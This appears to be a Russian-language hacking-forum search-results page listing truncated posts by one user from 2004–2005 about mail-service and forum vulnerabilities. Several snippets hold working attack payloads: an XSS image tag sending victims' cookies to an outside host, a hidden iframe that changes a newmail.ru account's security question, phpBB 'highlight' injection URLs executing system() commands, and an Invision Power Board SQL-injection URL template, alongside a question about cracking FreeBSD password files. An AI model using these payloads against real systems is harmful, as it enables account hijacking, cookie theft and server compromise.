 |
 |
 | |
 | |
| |
 |
 |
FORUMS | |
MEMBERS | |
RECENT POSTS |  |
LOG IN |
|
||||||
|
Показано с 1 по 25 из 25.
На поиск затрачено 0.00 сек. Поиск: Сообщения от: LittleLamer |
Раздел: Уязвимости Mail-сервис
07.12.2005, 22:22
|
|
Ответов: 36
Просмотров: 4,870
Автор
LittleLamer
может пользователь кнопку Выход уже давно нажал?...может пользователь кнопку Выход уже давно нажал? тогда эти куки недействительны! |
|
Раздел: Уязвимости
15.09.2005, 23:01
|
|
Ответов: 16
Просмотров: 2,218
Автор
LittleLamer
Да, только вот с помощью этой xss пароль от ящика...Да, только вот с помощью этой xss пароль от ящика угнать не получится. Ведь mail.rambler.ru и health.rambler.ru разные сервера :( |
|
Раздел: Уязвимости
13.05.2005, 01:40
|
|
Ответов: 9
Просмотров: 2,101
Автор
LittleLamer
|
|
Раздел: Уязвимости Mail-сервис
03.04.2005, 12:01
|
|
Ответов: 26
Просмотров: 1,742
Автор
LittleLamer
Блин, ну а как по другому может быть? Конечно...Блин, ну а как по другому может быть? Конечно сработало. Вам может видео нарисовать? |
|
Раздел: Уязвимости Mail-сервис
03.04.2005, 02:57
|
|
Ответов: 26
Просмотров: 1,742
Автор
LittleLamer
|
|
Раздел: Уязвимости Mail-сервис
03.04.2005, 00:31
|
|
Ответов: 26
Просмотров: 1,742
Автор
LittleLamer
Вообщем идеальным выходом для newmail`а по-моему...Вообщем идеальным выходом для newmail`а по-моему является <iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=ВОПРОС&cp_answ=ОТВЕТ width=0 height=0></iframe> ©... |
|
Раздел: Уязвимости Mail-сервис
02.04.2005, 22:33
|
|
Ответов: 26
Просмотров: 1,742
Автор
LittleLamer
Если конечно в браузере не выключить поддержку...Если конечно в браузере не выключить поддержку реферера. В опере по-крайней мере такая возможность есть (правда по дефолту реф включен :) ). |
|
Раздел: Уязвимости Mail-сервис
28.03.2005, 03:18
|
|
Ответов: 30
Просмотров: 4,657
Автор
LittleLamer
это всего лишь теория, самих алгоритмов помоему...это всего лишь теория, самих алгоритмов помоему ещё нету :( |
|
Раздел: Уязвимости Mail-сервис
26.03.2005, 02:46
|
|
Ответов: 10
Просмотров: 1,730
Автор
LittleLamer
|
|
Раздел: Уязвимости Mail-сервис
26.03.2005, 00:30
|
|
Ответов: 10
Просмотров: 1,730
Автор
LittleLamer
1) два перевода строки - это спецификация HTTP...1) два перевода строки - это спецификация HTTP протокола и означает конец запроса 2) $dt.=fread($f, 1024)это в php означает увеличения строки $dt на прочитанное из сокета $f. Т.е. если точки не было... |
|
Раздел: Уязвимости Mail-сервис
25.03.2005, 21:24
|
|
Ответов: 10
Просмотров: 1,730
Автор
LittleLamer
|
|
Раздел: Уязвимости Mail-сервис
25.03.2005, 21:22
|
|
Ответов: 10
Просмотров: 1,730
Автор
LittleLamer
Например ты почил куки таким (или похожим)...Например ты почил куки таким (или похожим) способом: <img src="javascript:img=new Image();img.src='http://mysite.com/xxx.php?cooki='+escape(document.cookie)"> (для маила это конечно не... |
|
Раздел: Уязвимости Mail-сервис
25.03.2005, 12:53
|
|
Ответов: 10
Просмотров: 1,730
Автор
LittleLamer
Да, возможно. Нужно знать либо HTTP протокол,...Да, возможно. Нужно знать либо HTTP протокол, тогда fsockopen() и т.д. Либо юзать setcookie(). Мне более по душе первое :) |
|
Раздел: Уязвимости Mail-сервис
20.03.2005, 22:27
|
|
Ответов: 30
Просмотров: 4,657
Автор
LittleLamer
Если кому интересно, описания взломов хэшей md5 и...Если кому интересно, описания взломов хэшей md5 и sha1. md5: http://www.securitylab.ru/53242.html ("Взлом MD5 хеша за 8 часов") SHA1:... |
|
Раздел: Уязвимости CMS / форумов
29.01.2005, 03:25
|
|
Ответов: 2
Просмотров: 1,122
Автор
LittleLamer
|
|
Раздел: Уязвимости CMS / форумов
28.01.2005, 03:49
|
|
Ответов: 2
Просмотров: 1,122
Автор
LittleLamer
Сколько полей в таблице ibf_topics в форуме Invision Power Board 1.3.1?Сколько полей в таблице ibf_topics в форуме Invision Power Board 1.3.1? /* нужно для sql injection http://[target]/ssi.php?a=out&type=xml&f=0)[SQL-INJECTION] */ |
|
Раздел: Уязвимости CMS / форумов
29.12.2004, 02:16
|
|
Ответов: 9
Просмотров: 1,018
Автор
LittleLamer
viewtopic.php?t=[topic]&highlight=%2527.include($_...viewtopic.php?t=[topic]&highlight=%2527.include($_GET[cmd]).%2527&cmd=/tmp/1.php хотя не обязательно сработает, но попытка - не пытка =) |
|
Раздел: Уязвимости CMS / форумов
27.12.2004, 06:15
|
|
Ответов: 0
Просмотров: 843
Автор
LittleLamer
Исследование уязвимости в phpBB (highlight) в Гугле =)Вот полазил по гуглу - баг php ещё рулит, тока вот далеко не на всех сервах можно выполнить команду system(), а мне хотелось получить не которые данные из базы. ВОт что получилось в результате: ... |
|
Раздел: Уязвимости CMS / форумов
27.12.2004, 06:08
|
|
Ответов: 9
Просмотров: 1,018
Автор
LittleLamer
если файл 1.php лежит в /tmp, то можешь запустить...если файл 1.php лежит в /tmp, то можешь запустить так viewtopic.php?t=[topic]&highlight=%2527.system($_GET[cmd]).%2527&cmd=php /tmp/1.php |
|
Раздел: Уязвимости Mail-сервис
14.12.2004, 23:47
|
|
Ответов: 32
Важно: XSS mail Tester
Просмотров: 21,262
Автор
LittleLamer
Чё т мне кажется, что нужны не готовые...Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное. P.s.: хотя я могу ошибаться ;) |
|
Раздел: АнтиАдмин
11.12.2004, 21:28
|
|
Ответов: 1
Просмотров: 1,616
Автор
LittleLamer
Пароли в FreeBSDКак я понял пароли в FreeBSD хранятся в файле /etc/pwd.db. В каком формате они хранятся там, и чем их расшифровать(подобрать)? |
|
Раздел: Уязвимости CMS / форумов
08.12.2004, 14:47
|
|
Ответов: 2
Просмотров: 1,140
Автор
LittleLamer
|
|
Раздел: Уязвимости Mail-сервис
30.11.2004, 23:02
|
|
Ответов: 32
Важно: XSS mail Tester
Просмотров: 21,262
Автор
LittleLamer
|
|
Раздел: Уязвимости Mail-сервис
30.11.2004, 16:22
|
|
Ответов: 32
Важно: XSS mail Tester
Просмотров: 21,262
Автор
LittleLamer
Ну это пока тестовая версия, и она только для...Ну это пока тестовая версия, и она только для email-ов. А за OnERor псб - торопился :) На счёт выложить - попозже наверно, счас программа сыровата. |
|
Раздел: Уязвимости Mail-сервис
29.11.2004, 02:11
|
|
Ответов: 32
Важно: XSS mail Tester
Просмотров: 21,262
Автор
LittleLamer
XSS mail TesterЗацени плиз мой XSS Tester: http://sec-123.narod.ru/xss/XSSTest1_0.rar Тестирует тело письма на известные ХСС. |
| Показано с 1 по 25 из 25. |
